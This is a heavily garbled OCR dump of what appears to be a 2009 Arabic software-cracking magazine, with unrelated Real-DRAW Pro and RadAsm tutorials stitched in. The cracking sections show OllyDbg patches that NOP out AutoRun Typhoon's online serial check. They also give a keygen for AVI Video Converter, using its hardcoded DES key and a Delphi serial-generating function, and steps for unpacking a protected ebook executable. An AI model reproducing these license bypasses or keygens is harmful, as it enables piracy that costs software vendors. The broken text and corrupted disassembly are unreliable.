MOU EBP,2 
LEA ECx, DWORD _PTR SS: [ESP+18] 


MOU_AL,BYTE PTR SS: [ESP+591C] 
TEST AL,AL 


CMP EBP,1 


ASCII "Prince” 


DDD 


AutoRun Typhoon - Serial Number 


Name Prince | 


Serial Number — |0600-3456-8237-43944 


Invalid Serial Number 


Validating Serial Number 


In order to unlock AutoRun Typhoon you must first validate your Serial 
Number with the Typhoon Software server. This is the only time AutoRun 


Typhoon will send any information over the Internet. 
Make sure you are connected to the Internet, then press Start. 


Tip: You may need to temporarily disable your Firewall 


abi ly Uca do lla 2009 


las leg as az Ives sz: ATARE 


salte Ost ut 


Validating Serial Number 


In or 


24 


Algo diia np 


[File :) 


ed “s do 
aye ga zio start 


[| Exeinfo PE - ver.0.0.1.9 B1 by A.S.L - 415 sign 2008.08.24 


Entry Point ; 


File Offset : 


Limker Info : 


File Size: — [0024E000h | 


Image is 32bit executable 


Subsystem : [Win32 GUI | 
Overlay : 


Eres HA 0 UA eS y Est 


lasiacloedae 


Adi) 


: ExelnfoPEv0.0.1.9: ¿20 80) 


+, 


NO 00000000 


A INS 


¡Microsoft Visual C++ ver 5.0/6.0 
Lamer Info - Help Hint - 45 Ripper ( search EXE PE inside EXE ) 
[not packed, try disasst P-] Ripper ( search ZIP archives ) 


Y Ripper ( search Rar archives ) 

e Ripper ( search MSCF CAB files ) 

(4 Ripper ( search www ] http : - address inside ) 
03) Ripper ( search SWF flash animations ) 

(62) Ripper ( search hidden NSTD icon data ) 


od A de 


> y y yl e jo 0) 2 


[00] EP Section : | text Cua] 
First Bytes : [55.88.EC.64.FF] [2] 


4 


DES a pg a: 


las leg as yz Ives sz: ATARE ui 4 dd CO id dd EST EA 


ww f http: - side search : OODODODO to 0024E000 


http: /fumsw, autoruntyphoon.com/ upgrade. htm >this ES 
ran, autoruntyphoon.comupgrade.htm:>this ¡ 
http: fun, autoruntyphoon.comfupgrade.htm>upgrade 

a, autoruntyphoon.comfupgrade.htm>upgrade 

http: ¿fumww,Eyphoonsoftware.comfupgrade.htm>upgrade 


wan Eyphoonsoftware.comPupgrade.htm>upgrade o 
a, autoruntyphoon.com 7 
http: ¿fwmww,Eyphoonsoftware.com/validate.asp?license_name=%s8license_code="%stidate= 


ww, Eyphoonsoftware.com/validate.asp?license_name="4stlicense_code=Wstkdate=Ws8wers 
http: /funww. google.com 
a, google.com (m] 


* 


PUJAR CEA 
Li” E 


47 ej ros ala 4, ¿A Jar pod ds ¿Eo 


, . 


04 ¿ole e eQd? 3 


Esas 


E ¿oz Y OllyDbg 


HOL1L CAYAMAd” ST 
ASCII "4.8.4" a 
ASCII "http: “www. typhoonsoftware. com lidate.asp?license_na 


ASCII "OK_SUCCESS_ORDERS” 


ASCII "<B>Serial Number acceptedt<B>”,CR,LF,CR,LF,”"Your Seri 
AS IL_ADD_PIRATES” 
1 "<B2Ser ial Number Dgo! inedt</B>”,CR,LF,CR,LF,”"Your Seri 
B>Serial Number Declinedt<-B>",CR,LF,CR,LF, "Your Seri 
ASCII "error” 
ASCII "<B>Could not Connect to Server</B>”,CR,LF,CR,LF, "Make 
ASCII "MESSAGE_PAUSE_SOLND” 


+ 29 


a ly el dao Illa 2009 


las leg as az Ives sz: ATARE 


PUSH BO4FOF98 

PUSH_004FOF94 

LEA ECX, DWORD PTR_SS: [ESP+28] 
q MOV BYTE PTR SS: [ESP+B4],5 


MOU EDX, DWORD PTR SS: o 
MOU EAX, DWORD PTR SS: [ESP+24] 
MOV ECX, DWORD PTR DS: [ES1+4474] 
PUSH _EDX 

MOV EDX, DWORD PTR SS: [ESP+24] 
PUSH EAX 

PUSH ECX 

PUSH_EDX 

LEA EAX, DWORD PTR SS: [ESP+20] 
PUSH B04FOF34 

PUSH EAX 


MOU O PTR SS: [ESP+34] 


LEA ECX, DWORD PTR SS: [ESP+44] 
MOU EDX, DWORD PTR DS: [ESI+2264] 
PUSH EBX 


DX 
MOV EBP,EAX 
CALL EDI 
PUSH BM4FSECO 
LEA ECX, DWORD PTR SS: [ESP+18] 


LEA ECX, DWORD PTR_SS: [ESP+18] 
4 MOV BYTE PTR SS: [ESP+AC],6 


MOU EAX, DWORD PTR SS: PEE 


a dd niociozdoner 


Al dl, 


ASCII "http://www. typhoonsoftware.con/val idate, asp?licen 


A puedo Ju pila 


Jamal a 


/ | 


2CX=00907798, Ten "http://www. typhoonsoftware. CTTHETA asp?license_name=Pr incet:l icense_code=0600-3456-8237-439M4t:date=200809172vers Lon 


3 


o a bsdsro* gay 00425170 132 ) 
16 lá inó0 jas in jo OU yo 


] El ju eS gas d Áy Start 
ye Pl ¿ula E 0 poe y du pot: 


PT P+44 
ESI+ 
sónboia dor et es2o 00425186 : 


A INS 


las leg as yz Ives sz: ATARE ui ¿6 dd cd ¿6 (a dd EST EA 


; BBG424 26 NOU EOR,DIIORD PTR Sos LESPADOl 

. BB4424 24 HOW ERXS DUIORD PTR $5: [ESP+24] NOP 

. BBBE 74440000 | MOU ECX,DIWORD PTR DS: [ESI+4474] 

E PUSH EDX 

. 8B5424 24 M0U EDX, DWORD PTR $5: [ESP+24] 

. 50 PUSH EAK 

. Bl PUSH ECX kernel32, 70800710 
. 5 PUSH EDX 

+ 804424 20 LEA EAX, DWORD PTR $8: [ESP+2CJ 

0 ES 240F4FOO Ela] El ASCII "http://www. typhoonsoftuare.con/val idate. asp! 
+ ES BI5DOG00 

+ 8B4C24 34 NOU ECX,DVORD PTR $5: [ESP+34] 

. 8804 18 ADD ESP, 18 

. 5 PUSH EBX 

. 5 PUSH EBX 

. 6A0l PUSH 1 

. 68 Ol000084 PUSH 84000001 

El PUSH ECX kernel32, 70800710 
+ 804024 44 LEA ECX, DWORD PTR $5: [ESP+44] 

. ES ABGLOGO0 

. 8896 64220000 | MOU EDX,DWORD PTR [y [ESI+2264] 

. 5 PUSH EBX 


= $ yyy 1 Óya posdó y proa 30 Aya aio Fo cs Le] julia ¿sega NOP 22 CU Ja de: 
eo es2v0042518A sto *ustuioc bt 


ero SEU004251B6 : 


Es 32600800 
8B5424 23 MOU EDxX, DWORD PTR SS: [ESP+28] 
B4424 24 MOU EAX, DWORD PTR SS: [ESP+24] 
SBS3E 74440000 do ECX, DWORD PTR DS: [ESI+4474] 


co 


¿8888888888888 
3 


and? 197 


a atar 


8D4C24 18 LEA ECx, DWORD PTR SS 

068424 Acoganaa a MOU BYTE PTR SS: CESAR 
ES 29500800 
8B45 BB MOV EAX, DWORD PTR ES 

Enposa E IO E AutoRun Typhoon has encountered a problem and needs 
88cD MOV ECX, EBP ]  toclose. We are sorry for the inconvenience. 

C69424 eaenaaaa q MOU BYTE PTR SS:LES oia (da ale Uni 


85c0 TEST EAX,EAX 495 
74 1F E 0042: LF. Ñ ' . 
805424 18 LEA EDX, DWORD PTR SÍ Ifyou were in the middle of something, the information you were working on 


804024 14 LEA ECX, DWORD PTR $3 ll 
E AED might be lost. 
ES CE6MnB800 


MOU EAX, DWORD PTR $3 For more information about this error, click here. 
En4c24 18 LEO ECK, DWORD PTR S$ 


8BCD 0 ER EBP Cl 

| FFSO 60 Close | 
. 85C8 
3| ,* 75 El 
3 2896 64220004 H E 
35: [7636E060]-00340388 [StarBurn. 00340388) 


del sd usa du) do as Ja Y jas cojas y 


1 doo eLo!!! 


all ly 0 zado lll 2009 


las leg as dy Ives gasz: ATARE 


Ad 


HOGAR NOP ¿sd o 


E ANN 


lila 


sy 


o Losparon Assemble at 004251FF 


E 94500800 


PUSH_B04FSECO 


LEA e PTR SS: [ESP+18] 


LEA ECX, DWORD PTR_SS: [ESP+18] 


0eo424 ACOBBBAA A MOV EvTE PTR SS: [ESP+AC],6 

ES 89cDOSOO CALL _<UMP, EMFC42,1540_CString: :CString? 
8B45 00 MOU EAX, DWORD PTR SS: CEBP] 

E 18 


: ha Md . 
Fu id »DIJORD PTR SS: [ESP+18] IV Fil with NOP's 


88CD 
Cos424 BOBDBBDa eno E En SS: [ESP+B01, 7 
FFSO 60 


CALL DWORD PTR DS: CEAX+60] 
85ca 


4 1F 


7 
ONCADA 10 


TEST 5er EAX 


Len CAY MiñNDA DTD Cc-FECDL1O1 


Cancel 


PEAK Pop Jráqitiajals JJ 30) ió do ya cabo Encas EAX,EAXTEST : 


C6s424 BoB0BB0s A MOU BYTE PTR SS: [ESP+B0],7 
s8 POP EAX 

8 
¿eco 


Jimp Assemble at 00425204 


HOP 
TEST EAX, EAX 


LEA EDxX,DWORD PTR SS: LESP+18] 
ERA LES DWORD PTR SS: [ESP+14] 


Jmp SHORT 00425225 


52 

Es CE600s0a 
8D4C24 18 
ES 


MOU EAX,DWORD PTR SS: LE! 
ES ECX, DWORD PTR SS: [ESP+18] 


hod E ibRoal 


ST_EAX, EAX 
EL! EEZ DWORD PTR DS: [ESI+2264] 


74 1F 

205424 18 

2D4c24 14 
IV Fill with NOP"s 

FFSD 6a 

esco 

"LóBos eszzaaoa 

s3 


és S2oqon00 
52 RutoRun_ eo 
USER32.SendiMessa 


FFD? 
68 200F4F00 


PUSH BB4FOF20 


ASCII POR SULCESS ORDERS” 


Cancel 


DB425244]_. 


8 ay ul ao lll 


Pl pe E Sr 


35ca TEST_EAX, EAX 
90 NOP 


NOP + 
do BYTE PTR DS: [ESI+4468], 1 
U EAX,DWORD PTR DS: [ESI+2264] 
PUSH EBX 
PUSH 3 


En NOP 
C636 6844D008 01 
Bb8s 64220990 


3 
6A 43 


A 
6 Cos ¿NOP 
Serial Mumber 


PutoRun Typhoon 


Validating Serial Humber 


Serial Number accepted «=== 


Your Serial Mumber has been validated and véll be saved so you dont have 


to vabdate again. You may now begin creating your AutoRun Typhoon 
projects. 


If you disabled your Firewall, you may nove turn £ back on. 


UiáLo y£ yes 300425225 SHORTJMP : 


ld les a VES UAG: ATARE ui dd CO ST EZ 


EST EA 


; y o a ? e Po ; S BD e 1h 
E A A 


Ed . .a 
tdi 


J 


Elo 303 ¿iy Popoidó, da, 
ca E Ys us 2) gs A $, 30 EUA da dig y 3 aja al PAE 
coo SN qu ly Eu Labio qa TOS abad 


www.typhaon.com : ¿+22 www.typhoon.com 


p ñ A Sos 
349 bed a Js 


¿Aa Al ió la 


Ly sE Lójs En epodó ó EE pa abro 80) o y 30 2 Ed AD 
CES ES Eds dC sb a dd qa ¿ 36 E 
5 Ju o Le Lo, 
deals y 
xs du ¿uo? STE Lodo e 


a 


[sai [Manual 
| > AutoRun Typhoon.exe 
7) ON AutoRun,exe 

ÓN AutoRunsE.exe 
uments 
19 
mputer 


atwork File name: AutoRun Typhoon2.exe 
Save as type: Executable file (*. exe) 


ces 


9 eN ed Ur aga as e DC 


Da 
a 
¡DO 


Command : l ar Ra Y 


Pó 
Aa 


Mani 


Program entry point 


a ay ul dao lll 


EJ, 


dl dal dos CRC32 


las leg as yz Ives oasz: ATARE 07 ¿6 dd co ¿6 E 8 dd EST EA 


al 


ral 16,0 doz alle ExitProcess BP cs 1] pá EY jala a olly 


Epa (00 ¿uz Cop aas WO: 


MOU EDI,EDI 


4 PUSH EBP 
5 MOU EBP,ESP 
AA? 6A FF PUSH -1 
'AAS 68 BOF3ES77? PUSH 77ESF3B0 
'ARE FF75 68 PUSH DWORD PTR SS: [EBP+8] 
'AB1 ES 46FFFFFF 
AB6|* E9 29CFB196 
ABE 96 
'ABC 
ABD 
ABE 
'ABF 90 
31C0AC0|- FF25 FS813807C 


3) is as ced 4 1 big ¡alí ab. ERES, eS PRES caia ye 


ola 
ba 


5 pr ExitProcess prom msvort . 77 C39D3F 
ExitCode = B 


77C39E78 | RETURN to msvcrt.77C39E78 from msuvcrt.77C39D13 
5/5]=15]=1=1515] 
au1207F4 
E 


DO 


77C39E90 | RETURN to msvort.7rC39E99 from msvort. 77 C39DDB 
slaJs15]51=1515] 


5/5]=15/515151=] 
5/5]51/515]51=] 
6012ER20 
00404BB7? | RETURN to AutoRun_.00404BB7 om msucrt.exit 


55l=15]515115] 
BO4FSSCO | AutoRun_. 104 FSSCO 


DO 


bs add Jo ó OIDO 
: AutoRun_.::00404BB7 


La Lis Go to ESP * 

EEES | rerur enel Ñ 
EE pie Go to expression Ctri+G 

01 1Ach4 Follow in Disassembler Enter 
PE RETURN to msucrt.77 Foll in Dump 
(5/5/55 [5151515] 
pi Appearance » 
00404BB7 | RETURN to AutoRun_.144449BBrf +trom msucrt.ex1t 
(aT=T=f=12]215]=] 
BB4FSSCO | AutoRun_. 604FSSCO 
BB4FSSCO | AutoRun_. 104 FSSCO 
Bu12FFCO 


A O a ok .. 
PING col 


a ly el dao lll 2009 


las leg as yz Ives oasz: ATARE 


ES BESDOROO 


+. 289424 D4100000 
. 3B4424 10 
. 52 
00404894 ||. 58 
00404895 +. FF15 8CDB4B00 
Peto . 8304 08 
0040 . 8500 
00404BAD .vr74 15 
D0404BR2 . [8B4C24 14 
00404BA6 ||. [51 
0B4B4BA? ||. | FF1S CCDB4B00 
00404BAD||. | 8304 04 
00404BB0 ||. [53 
ARAAARRI FF15 9ANRARAA 


yá "age rai se aqu ua do 
H] E ya ¿duy € > dé da 
eat, Eo do oia ly pe pro 


yal o da japo 


aba?s Dakar il, ¿tó jabo sas dos 


Lo slze 00 t Por 


MOU EDx, DWORD PTR SS: [ESP+1004] 
MOV EAX, DWORD PTR SS: [ESP+107 

PUSH EDX 
PUSH EAX 


ADD ESP,8 

TEST EAX, EAX 

MOU ECX, DWORD PTR SS: [ESP+14] 
PUSH ECX 


ADD ESP, 4 
PUSH EBX 


EN 


A 


Oya jy diag ¿do ga Je aa ya y pl - 


EST EA 


E = "32fdfobbal66bf adb859d18c6b788d52” 
QU guia na 1 = "83bab430a718bdf 153098f6896bd4300"” 


_mbsonmp 


Mmsuort. 77C5FCEO 
stream = 00120708 
folose 


[sinyos =0 


exit 


ceo 


abra q dejo boya ds pl ja (23) 


; y 


0 y Ajá a Joly do, 


TN 
¿Aa JA, 


ala de muta sE JN 3 $902 10ó NE As Ya pd pS a f 
ay 3 0US 0 bel EN Ja epodí 


A INS 


las leg as dz Ives oasz: ATARE 07 ¿6 dd co ¿6 (a 8 dd EST EA 


AVI Vigleo Converter bb ay A ler 
IDEA 


keysennins AVI Video Converter (DES Protected) 


dudo 4d 00 ¿e 


Aja Eo do le ; Eye carol, DES 


.OllyDbg O yo 

-SnD Reverser Tool Y (65) 

.Delphi 7 o) — 

AVIVideoConverter2.1.3633ya Hs cayetlz (£2) 
[E a 


Gol ss Yiye? sra aDES * 
Ara ¿all Kanal (¿4 yo ás) : Juliga Jas y ta 3 js PEID 
7F PEiD 40.94 “a KANAL v2.90 
File: | C:iProgram FilesiPegasus 
Entrypoint: | DODESC9O A 
File Offset: | 000ES090 
Linker Info: (2,25 


PS 


"Borland Delphi 6.0-7.0. 
Lmutiscan ] [taskwiswer ]| [Caboue]  [empor] [close] 


DES key permutation (PBox) 


2 ¿óleo sas CO e paa dal DES 


y o e Coca A ¿y do O 


28 23 080 dado lb 2009 


led lees 0d llega sz: ATARE ds 4 dd 0 Ud 8 dd lector z 


Esos gruas. yo ig ha joa yo loc a go to 8 ón DES . 10) 
.DeCryptRóbzo3  34dó: Leg? ¿Es : Loly EnCrypt (0) 


Loco JU saña, CTE AE S q O Ba qlexó Key o) 


ds dy de don) gr ds 


ted eya: oe da ómaióa ja ATARE ¿adiós ¿DES Je óráblea y, 
35 aia de py alo do; DES (EnCrypt) %g 52 SndReverserTool ió ¿há ¿úeowó 


6 


1) HEX (O vasos 2 aj aa VII 968d9d1b5f836a39 


ya 
DES (Data Encryption Standard - Encrypt) 


y 


[1234564BCD 


SEldJY  Des..Decryptóg q dy: dels yd 5) Imputciaa* + 4968d9d1b5f836a39 : yadaá SOS 
de als E ATIRE Mz gas sui jo eto! 


all Bu ls vall de Ado bes (446) 


lg los aaa Ives ago: ATARE dui 0 dd 0 Ud 2oEz lacados e 


A IM 


IU: 5 LaáLlo 


Registration is failed. Please check ús aá cu d0%2ó Register YÍr¿ y Ei ya 99 a e - 


aya lyDbg 54 soga jas 31, abans e óaallés OOADDRAD. 
rg gd coro Lic dz Ja ¿ua 


Roben: ¿lá o 
11223344556677889900 : 4 O 


pen bd má ya is 0 gi Go id, dd a 2 Oya posó ya ye Register el e d S 
cargo GÓj VMZF8: 


Judas 2 cod! lia 


ji! Ju dl 
DO4DDSDO de 


0012F780]=00FÉDEBC, 
114 


di 30 :770video920avi532 Y 113 


- 0) 301 ÍY ed da ye Oualeriasl y lloc 


ai ls Uca lps 2009 


lg los vaa Ives ago: ATARE WweedVsz 


DO4DDSDC 


A 


Ay 14 id Y ¿osas dááya 00 
(AsD9+ófÁ : quibs Eóyó ? 


3 


ya (54 
ld 6 Char 7 03 


Fa 


7 yr Esas Cleón ¡yayo áóya Cua rd dy n 


hos) ) taa ad, os 


-1JJV seal 7,2 DOADD7BO Call ¿ózz 91 *EAX su o ÉDOF3D5FA4 


O04DDSE3 ¿sul y ico Sl ei 


Asccii 


aga) JO 


+ B3glst3rs (FPU) 


DO4DDSFS 


ss gráldes ¿yo asas Bye lla ¿bj o ¿ue q gue at Jl ¿lOs 00404868 Call 
3 5 ) ¿ya 


all ly 00 ¿Ja Iboga 2009 448 


lg lus aaa Ives ago: ATARE clvedosz 


+|R3glst3rs (FPU) 


A 
|EDX_00763€59 
D040486F 


aras ge Soya raya $ eta ra : 


.770video920avi532 : gue dh Sta DES 


J Úca 3 Dé a E UA 34 > 


. Roben Ey 2 cid pls Gáslyz, ale 


dy ol dez Sas ¿noción ¿oa Ao ¿bg t 


3llgd ETE al 304 5Des PEót? ¿bdo slo ¿op 


> AGOL E Us «Tool Reverser SnD 1535: 


Key =770video920avi532 ------- 


Input = Roben  ----- 


all ly 00 ¿Ja Iboga 2009 


luis leg as ay lveSuasz: ATARE wired. e 


DES (Data Encryption Standard - Encrypt) 


Roben 


e AO a pts ql: 


Successful 
onverted. 


E is not available. 


e, 
1 ) Thank you for your registration Ind remove limitations 


mail includes the 
ter your copy. 


1. Enter your name and Registration Code: 


Your name: |Roben 


Registration Code: [H649257dab2c11c 


2. Click "Register" to register. 


J Register | Later | 


1) due dy dy a lujo DES LOGO, ¿og dy jo ¿gls 10) 


all Bu ls ud de Ado ¡bes (aso) 


las leg as yz Ives gasz: ATARE 


Uses 
cá DES£ 


AA dd 


se e ¿Bye DES.pas ( $0 ze.) 


E ¿7 in jya ón ¿silo Delphi 5 


¿ón ajja ds Luo a 


Function GetSerial ( Name: String ): String; 


Var 


Key, Temp, Serial :String; 


Il: Integer; 
begin 


key:='770video920avi532'; 
Temp:= EncryStr (Name ,key); 


EST EA 


sois: 


// Convert To Hex 

For i:=1 to Length (Temp) do 

begin 

Serial:=Serial + IntToHex (ord(Temp[il),2); 

end; 

// Return 

Result:= Serial; 

End; 
E Y aya ¿0 Loc? Hoja Ly Luo EQ00Óly, aa 
OY 43 87 nue rita ja go e pla, ja od es $e 

las ¿ua qdo leo ici ja 
aio 0 U cada do lll 2009 


¡OO) 


loba leg y IES AGE: ATARE de dd CO ST =EZz wird 


¿Bopje e ladies Mjgsh ela) 


Workshop 


prtagibl og gó gt jgd yd du guido ¿ud Ub rra ón 


a, A? GRIS e 


corbadiós : 
ESE ISA 
Sc les 
PENES 
Aca joa 
«de jeall Snifer 345 )5 
18 De Só Mos de galas 


-OllyDbg any version Y 


.MASM + RadAsm Y 54) 


. ATARE FastScanner v 2.0 O A 


[EN | (D) 


NN O 
a Jan 


A 


Eo 350 Sy y ya 30 ¿0 


úl azi) e os a ao ls zo 


DOC«PDF«EXEj0 9 30d 30100) oz TÓXLLOS do dde 3 Ayala 3 3 336 . 


ai ls Uca lps 2009 (452) 


las leg as az Ives oasz: ATARE ui 4 dd 0 Ud 8 dd alvedOz 


Lala ¿de ) pu az pst, só 0 Nido 
¿pta eze y 330902 Workshop Ebook ¿9 


as ul. Ed Desa 0 ¿de .) a ¿óaye alles 
do 


Jgós Workshop eBook ÍJyó QOS queso, pd das JO, q Copla a 


ás Exemple Lexee ja pá 


¿3 Ebook To Crack Ed Dd Cal alo il Ed 


4j0Y aio Jaga do: 


PE Frensh Clojw 
001-027 As 139 


eboo' 


Enter Password 


Remember 


x ds 
9 Password “; 3 


“ a E O a as es Ñ be a ps Y Y 
boy % Ja 20 IS Espoo FE y OY jad, ao gai ips yo ¿ 
Ma 


Zig higo his 


duce ptas lol Y leo FastScannerAT4RE 


Ji la Y yá, 


A IIS 2009 


las leg as dz Ives oasz: ATARE 07 4 dd cd 4 d 8 dd ESTE 


=K 
Version 2.0 
IF HOWTOC=3EBOOKT=14EXEMPL1.EXE] 
Entry Point EP Section PE 
Base Of Code First Bytes DS 
Image Base Base Of Data 


[open open varas BN res roo 


cmd «ÍigY 5 ASPack 


- | ce vs sE AAA ha L A ; 
305 SOY Ono job Ig OO AE o A 
Aedáya 


A) digo? ás 309 


FU sg a sl a 17 sa rol és al yla a da ly 24 ba cs e ¿go o) pul tj ap 


Ye pst ll alg a] 
pág oy JO ds pe ds Eg a: 


EAxX BOBBBaBa 
ECX BO12FFED 
EDx 7C91E4F4 ntdll.KiFastSystemCal lRet 
EBX 7FFDBOGO 
ESP ES 


el Increment Plus 
EDI Decrement Minus 
ElP 

Zero 


Set to 1 
Modify Enter 

Copy selection to clipboard Ctri+C 
Copy all registers to clipboard 


: Dumps 204 cda 


all ly 00 Ja Iboga 2009 


lid log va loe ago: ATARE hi GATE oz Ez TA 


Backup la 
Copy » 
Binary » 
» Memory, on access P: 


Memory, on write 


2NDATDA Ll 


ollow DWORD in Disassembler 
Follow DWORD in Dump 
Go to » 


Hardware, on access 
Hardware, on write » 
Hardware, on execution 


Mod: 


Dword 


Hex > 
Text > 
Short » 
Lomg > 
Float » 
Disassemble 

Special 


Data Ripper 


Hash Sniffer 
ILLY 


Appearance 


UV 4 área als 99: 


MOU EAX, 1 
RETN ac 
PUSH Exemple_. 00480858 
RETN 


LEA ECXx, 


SN 7 


FEU a ja yo OEP : 


E A ES Ja) ly A+Ctrl y ES pa yañmilad 98/, HardWare q Ex *adadeo, 5 


: Debug yan 


28 2/13 00 dado lbs 2009 


las leg as yz Ives oasz: ATARE 


dut ¿o jad po ¿oi jale QUES 3 


A TIN 


db saltE Ort ut IS 


Debug Plugins Options Window  Hel 
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Matte Canwas Borders 


General Settings... 


Flatten Canvas 
Blueprimt 


Production Notes... 


Global NPR Style... 


Document Properties 


Objects: 2 Groups: O Wectors: 179 
Textures 


Preloaded in Document: 40 


Canvas Size Canwas Color 


Preset | Select... 

Width [400< | y) 
E A] pisels E 

Height |300<; 2 Web [FFFFFF. | [Select.. Y 


Note: If you want to resize the Canvas to accommodate all the objects use Trim 
Cnavas' or Trim Canvas+Padding' from menu Project. 


£: Real-DRAW Pro 
MN 6 o» E ES a TE 


Ctri+O 
Ctrl+s 


Save ÁS... 


y Bitmap Export... 


Megarender... 
Pure Vector Export... 
í HTML Slicer... 
MM 8 Script Export... 


Export to Clipboard... 


a 
Import... <= 21 


Print » 


PT 


Print Preview 


8 ay ul dao lll 


Rainbow | Uppp Skin 1 


ae Au: 


ACEITE 


Project ig 32 )1 
Size 8, Color... 35% 3 )2 


, , . 


ASES 


pal 200 Oapuóg cuo Grad 


ax 


Fileg 2 )1 


Import... 


2009 486 


lee legs my lle ago: ATARE luyya eS WwelelVrs e 


Load image file 


Regarder dans [ES Rainbow! Rainbow a Skin YO Pp Preview 


Nom du fichier: [Rainbow Vases Posters. jpg (Q J 400x320 
Resize £ Crop Next Step 


Fichiers de type: Al Image Files 


Duvrir en lecture seule 


¿20D 8 


TES E 


L Teseo | Tusempmerc! fevel * Shundones le Eltecta | 30 Lighés  Ltamp AT » 


esa: ¡ace - == 
ciel teleleleee a E 


425,185 400x300 nm Mesa: 100052 KB. 


ayas O ATARE "SÓ 


¿all m e 30d. 


a Ly 038 (ad ado lla 2009 


las lie as amd loeSagz: ATARE ESE 


£f: Real-DRAW Pro - [Untitled] 


E [Normal 

2 al 
E): diitnisicilaadol: 
G [Default Set v| 


Aligned Texture 
O Show Layers Above 


[Ouia [Era] 
== 190 mp =s NUM Mem:92648 KB 
Ha Cds E Ñ ef el 8 . mA 3 
alí il, Gliye ces Irasparene] (eelen AL AA a cal GA Ets YA 


A 


as 24 ca ye del a AA as 2 eg Eg me on p' STEIN E al) zoo 
y 6 eo l CS ÍVaiabos 2. 
Y sp lg, 3 liggo ay ll al dle pol 


3 


allas agro Leg alg ja usvibs NEU eo ib o Ehsd dja NS É AO 4 ay rl 
hs ES E ETS TR 
JD) y E 
E 


ON ll ogyálilja E e ss exeogáll 
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las leg as dz Ives oasz: ATARE luyya eS wealelVrs e 


Brushes 


Normal Y 
cecilia | | 
Default Set v 


SET FA MODE 


Ahgned Texture 
| [O Show Layers Above 


Brush 39: 330%, )2 ¿0 
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las leg as yz Ives sz: ATARE luyya eS WwelelVrs e 


adn E y da JS aL 


Catia: 


yt Ed 


queda asi yal eo já liós: 


vals igias sua jo gui 


ey id aos ys 


aj Lea JU ¿pci o m5 ya ¿Al es o Ml SAD: 


aby Uca ll pal 2009 


is lees mz les vago: ATARE luyya $S lvl. 


4. Real-DRAW Pro - [Untitled] 


>| No Texture j 


No Bevel 


Eg La TOR 


| Color te Texture Transparency || Bevel | Shadows t Effects | 31) Lights | Library A || Library B | User ME 


1354 ora 


e 


2 allá 22 Eo STA AO AN 04 4h] 5 > o 93) sad coda o, 


JESIPASAESI «Screenshots 2Ayady aj coa cda ze, 


y ral 


231, 130 400 x 320 NUM Mem:240208 KB 


alisiabiy3 pués ¿0 abiyabozy 39Screenshot 4, 


Pou E Ja ¿bot 3 sa) a A 


aby ly Udo lll 2009 


lies lug a om lu UAgz: ATARE lave ss lor dqloEdgt 


b e o 
pa DR) $0 dy) ZÉ 


va ¿dels : 


Cola ho Testo Tranapaency | Bevel | Shadows l Eliecta | 30 Lights | Lbsay A Ubray Dl Une 


ICOOAAOCOOAR 


Y ebiacra eslactad 49,310 420x422 a Paaerc 172012 40 


E | 
¡aa : | 
+ 990! 
le noel [EE lec. 


a E le Ll añ as 
ET NE 


-9x 
É 100% y dE SE 
Rainbow.rdw ||. 
D 50 100 150 200 250 300 350 400 4650. O Enabte 30 Lignts 
an 1-19 
8 | ' l o 
8 IA EL] 
jelalaicia | 
e IET 
E | Or6B  OHsL — [YColoize 
8 Hue 138 
; ; e 
2 Saturation [1] 
E , y ; , 
A 
¿ 
H Lightness 0 
3 : A », E 4 ib 
y 
—) 
3 | y —” y 
3 | 
S | id caló! 
" " E Normal Y 
Color é: Texture | Transparency | Bevel | Shadows : Effects | 3D Lights | Library A | Library B | User | 4% A. == | 
Ea] le o: Bit a 
ES [e3$ 09801 
y (6) wheel [55 le... Jes] 
Or G - aa 
422, 410 420x422 NUM Mem: 187288 KB 


Jae zo? : 


all ly 0d zado lll 2009 


las leg as yz Ives oasz: ATARE luyya 7 RO TIA 


TES 


ya us J3áos KAN mazos dla ya: $ ya ¿ja TA Qs: 


| 
> 


al ly 00 Ja Iboga 2009 


las leg as yz Ives oasz: ATARE luyya ss WwelelVrs e 


2) Real-PRAW Pro - [Untitled] 


, (20 +] Real Size EX B| 


; Styles 


| Color Temture Transparency | Bevel | Shadows t: Effects | 3D Lights || Library A | Library B | User | 


+9 090 


e 
103, 29 176x172 CAP NUM Mem:206136 KB 


Y lios olaya/ zar: 


) a ¿js 


BE gos Fijo jyeábs), 


Mya 


HA ad ge joa Je js y ta 


Fu y ¿aia O) cua) : 


a ay ul dao lll 


las leg as yz Ives uasz: ATARE luyya eS WwelelVs e 


ee id y ea e yr dal 


Lo ¿lsro laca ea eilo jue siab 
: Overlay 338 97 3 PLL AGO A 


Layers 


E 
QT 


Conwert To » 


Add To Object Library 


Color Pick 
fa 


vo 


a Ly 08 calado lla 2009 


las leg as dz Ives gasz: ATARE lOyya eS Wwe elvas e 


Poly-Line : "¿Y 3lg A" gore 307 eo ta 


Uppp Só Lb3c? alloDr.bad 3: 


Rainbow Il Dup Skin | (d) 


al ly 0d zado lll 2009 


lb logs az loe ag z: ATARE $ y id cie duc 


Masterins RCE tools 


RadAsm. OllyDbg and Imprec as examples 


¿os sad 


¿a det 


E 
LOs as 
3 ¿0 tao ggisós sha ¿48 OlyDge JYL ¿3005 2 botó 


1- Lac 


ya yO do ol 9, 


hr go RETO peana, 


Ay: sui Je 


JO 22 zer aboga, 


A yO ds yo jad ja dy jajaa a so ZO Has RADASM dt Ji a a La ye dicas jajja js llo 


Có y E yr ¿OL DA ya E zo ¿ya alero ay oda ¿ve cLóua 7 ae, 


Cra a gy A al) ya ¿EXxue 2 RADASM ¿gica ¿cala Extra/ RadPlugins ¿2 9Óya 03 ya 


.. 3 A A PO qe e. A . s cre 
1 “ULA JA abíáliyas 9 ¿LX%RADASM% Addlns Sd op 00 a ' DI O A, 


y Ú AS perl DEMAS 
ld aya 


E E ds 
Edo e Install 390 ¿0 ¿ona gala, 


ai ls Uca lps 2009 498 


leds lg aria IES Aga: ATARE gr eE dot 


2 -CodeTemplates: 5% 


mou) ¿2 dialog i2 (% 


4 -VersionControl : J* qoabó 


do YY 09 ¿porta se ¿dá ja 


Addins: 


AutoCorrect 
CodeComplete 
O Codesize 


M CodeTemplates 
Collapse 

Colref 
CreateProject 
CreateProto 
CreateProtoEx 
CtriNames 
DlgToWin 
DragProp 
FlipCase 
FontBuilder 

O insertColor 
MokeDef 


Mm 


dig 2 2  xuó 


El 
Q 


'¡Unlja der" Lan 


¡00 3 ja, 
¿sirva Jide zaesnippets q hs. 
p DlgToWin- 3 


API 7 Zo taz ds RADASM 


¿ooo opt incrementation asta ¿obs 


gestó sao a ¿og aga, 


TODO LIST 30862" 2á gary la pac 22Ó : TxtlnkMan- 5 


AE ORO y $000: TabAddin- 6 


